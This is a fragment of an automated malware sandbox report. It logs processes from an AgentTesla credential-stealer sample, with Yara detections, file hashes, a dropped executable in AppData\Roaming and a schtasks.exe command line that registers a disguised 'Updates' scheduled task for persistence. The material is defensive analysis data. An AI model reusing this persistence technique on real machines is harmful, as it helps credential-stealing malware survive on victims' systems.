Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

                                        Target ID:20
                                        Start time:15:01:02
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                                        Imagebase:0x310000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:21
                                        Start time:15:01:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:22
                                        Start time:15:01:06
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x640000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        No disassembly